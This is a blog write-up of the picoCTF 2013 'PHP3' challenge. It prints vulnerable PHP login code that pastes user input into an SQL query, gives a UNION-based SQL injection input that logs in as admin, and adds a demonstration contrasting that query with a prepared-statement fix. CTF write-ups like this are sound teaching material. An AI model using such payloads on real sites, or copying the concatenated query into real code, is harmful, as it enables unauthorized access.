Sic transit gloria mundi

Welcome


picoCTF2013 writeup (1)

Posted on 2016-11-03 | Updated on 2017-05-05 | Category: CTF

PHP3:
The SQL part of the source is as follows:

<?php
if ($_POST['user'] && $_POST['pass']) {
    mysql_connect("localhost", "php3", "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
    mysql_select_db("php3");

    // $user goes into the SQL string below without any escaping
    $user = $_POST['user'];
    // Second argument true: raw 16-byte MD5 digest, not the hex string
    $pass = md5($_POST['pass'], true);
    $query = @mysql_fetch_array(mysql_query("select user from php3 where (user='$user') and (pw='$pass')"));

    if ($query['user'] == "admin") {
        echo "<p>Logged in! Key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx </p>";
    }

    if ($query['user'] != "admin") {
        echo("<p>You are not admin!</p>");
    }
}

?>

The check can be bypassed directly with SQL injection, because $user is concatenated into the query string:
user: ') UNION select user from php3 where (user='admin') -- 
pass: anypass

key: 8ab9b92c174dd483ad17cee1bb0c5bdb
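
The challenge's query shape next to a parameterized version, as an added example that is not part of the original write-up or the challenge source. It assumes PHP with the PDO SQLite driver; the in-memory database, the sample row and the function names login_concat and login_prepared are constructed for illustration.

```php
<?php
// In-memory SQLite stands in for the challenge's MySQL database (assumption).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE php3 (user TEXT, pw TEXT)");

// Constructed sample row; the real table contents are not on the page.
$ins = $db->prepare("INSERT INTO php3 (user, pw) VALUES (?, ?)");
$ins->execute(['admin', md5('constructed-sample-password')]);

// Same query shape as the challenge: input is pasted into the SQL text,
// so quotes and parentheses in $user become part of the statement.
function login_concat(PDO $db, string $user, string $pass): ?string {
    $pw  = md5($pass); // hex digest here; the challenge uses md5($pass, true)
    $sql = "select user from php3 where (user='$user') and (pw='$pw')";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['user'] : null;
}

// Hardened form: placeholders keep input as data, never as SQL syntax.
function login_prepared(PDO $db, string $user, string $pass): ?string {
    $stmt = $db->prepare("select user from php3 where (user = ?) and (pw = ?)");
    $stmt->execute([$user, md5($pass)]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['user'] : null;
}

// The input from the write-up, with straight quotes and a "-- " comment marker.
$payload = "') UNION select user from php3 where (user='admin') -- ";

// Concatenated query: the UNION branch supplies the admin row.
var_dump(login_concat($db, $payload, 'anypass'));

// Prepared statement: the same input is only compared as a literal user name.
var_dump(login_prepared($db, $payload, 'anypass'));

// Prepared statement with the correct (constructed) credentials.
var_dump(login_prepared($db, 'admin', 'constructed-sample-password'));
```

MD5 is kept only to mirror the challenge; a real login would store password_hash() output and check it with password_verify().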

Augustus

© 2016 – 2019 Augustus